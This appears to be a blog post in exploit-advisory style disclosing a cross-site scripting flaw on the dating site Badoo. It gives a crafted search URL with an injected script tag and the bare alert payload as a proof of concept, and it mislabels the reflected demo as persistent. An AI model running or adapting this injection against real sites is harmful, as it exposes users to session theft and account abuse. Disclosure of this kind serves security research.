Badoo cross site scripting vulnerability

Badoo XSS bug- Demo

%+
                      $.......#........4.........|)........0............\/\/       %+

                        %+
                                                                     %+

                          %++++++++++++++++++++++++++++++++++++++++

# Exploit Title :Badoo persistent XSS vulnerability
# *Vendor*: www.badoo.com
# Author: $#4d0\/\/[r007k17] a.k.a Raghavendra Karthik D
# Blog: https://shadowrootkit.wordpress.com/
# Google Dork:  � 2006�2011 Badoo Trading Limited

************************************************************************************************ 

                                           Badoo is the largest Social
Network for Meeting New People locally in the world. 121
million members are already connected and more than 100,000 new members join
every day. Badoo is not only
the largest, but also the fastest growing Social Network for Meeting New
People globally. * *
Badoo site is ranked 115 by ALEXA.

************************************************************
Persistent XSS Vulnerability
********************************
{DEMO}:

http://badoo.com/dating/?location_id=0_0_0&location=worldwide&to_custom=%3Cscript%3E
alert%28%2Fr007k7%2F%29%3C%2Fscript%3E&gender[]=M&gender[]=F&age_f=18&age_t=80&is_extended=0&pos=custom

EXPLOIT: <script>alert(/r007k7/)</script>

Procedure: open the link given above. Observe  a pop-up saying /r007k7/

********************************************************************************************************
sp3c14l Thanks to my sw337 bro s1d3 effects and my friends@!3.14--
*******************************************************************************************************

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: